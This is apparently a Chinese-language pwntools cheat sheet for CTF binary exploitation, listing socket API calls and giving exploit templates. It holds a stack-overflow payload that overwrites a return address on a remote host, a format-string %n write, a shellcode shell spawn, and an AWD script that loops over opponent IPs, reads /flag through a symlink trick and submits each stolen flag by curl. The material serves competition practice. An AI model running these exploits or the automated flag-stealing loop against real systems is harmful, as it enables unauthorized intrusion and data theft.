api

接收数据
recv(n) - 接收任何数量的可用字节
recvline() - 接收数据，直到遇到换行
recvuntil(delim) - 接收数据，直到找到一个分隔符
recvregex(pattern) - 接收数据，直到满足一个与pattern重合的内容为止
recvrepeat(timeout) - 继续接收数据，直到发生超时
clean() - 丢弃所有缓冲的数据
发送数据
send(data) - 发送数据
sendline(line) - 发送数据加一个换行
操作整数
pack(int) - 打包发送一个字（word）大小的整数
unpack() - 接收并解包一个字（word）大小的整数

解题模板

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
#arch  "arch64"、"arm"、"i386"、"amd64"
context(arch = 'amd64' , os = 'linux', log_level="debug")
## 网络
dns  = remote('8.8.8.8', 53, typ='udp')
tcp6 = remote('google.com', 80, fam='ipv6')
# 监听
client = listen(8080).wait_for_connection()
# ssh
session = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0')
io = session.process('sh', env={"PS1":""})
io.sendline('echo Hello, world!')
#pack & unpack
def p(x):
    return struct.pack('I', x)
def u(x):
    return struct.unpack('I', x)[0]
#p = process('./elf', env={'LD_PRELOAD':'./libc.so.6'})
# EXPLOIT CODE GOES HERE
# debug
def debug(cmd=""):
    gdb.attach(p, cmd)
    pause()
# file io
write('filename', 'data')
read('filename'，lenth)
r.send(asm(shellcraft.sh()))
r.interactive()

栈溢出

from pwn import *
offset = 0x88
 r = remote("111.198.29.45", 34012) #连接指定IP及端口，题目给定
 payload = 'A' * offset + 'a' * 0x8 + p64(0x00400596)#发送数据，输入数据溢出,并覆盖,返回到目标位置
 r.recvuntil("字符串")       #运行到字符串位置停下
 r.sendline(payload)         #发送 payload
 r.interactive()             #交互

格式化字符串

from pwn import *
p = remote('111.200.241.244', '52927')
p.recvuntil("代码中的字符串")
p.send('')
p.recvuntil("代码中的字符串")
payload=p32(溢出点)+"aaaa填充字符串个数%偏移量$n"
p.send(payload)
p.interactive()

AWD模板

from pwn import *
context.arch='amd64'
# context.log_level='debug'
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr)))
def main(host,port=16957):
    global p
    if host:
        p=remote(host,port)
    else:
        p=process("./pwn")
        # gdb.attach(p)
        debug(0x00000000000739D)
    code = """string readfile(string name);string lnk(string src, string dest);string print(string x);lnk("/flag", "/tmp/y");print(readfile("/tmp/y"));"""
    p.recvuntil("size: ")
    p.sendline(str(len(code)+2))
    p.recvuntil("Give me your script(same size): ")
    p.sendline(code)
    try:
        p.recvuntil("flag",timeout=0.5)
        flag = "flag" + p.recvuntil("\n",timeout=0.5)
        info(flag)
        p.close()
        return flag
    except Exception,err:
        print err
        p.close()
        return "bad_luck"
    p.interactive()
if __name__ == '__main__':
    # libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    # main("123.57.209.176")
    # main("172.20.0.27")
    ips = [i.strip() for i in open("ip.txt","rb").readlines()]
    while(1):
        for ip in ips:
            try:
                sleep(1)
                flag = main(ip)
                # flag = main(args["REMOTE"])
                info(flag)
                url = 'https://172.20.1.1/Answerapi/sub_answer_api'
                token = 'token78s8gbv55k4b03'
                cmds = 'curl -k {} -d "answer={}&playertoken={}"'.format(url,flag.strip(),token)
                print cmds
                if 'flag' in cmds:
                    os.system(cmds)
            except Exception,err:
                p.close()
                print err
                continue
        sleep(30)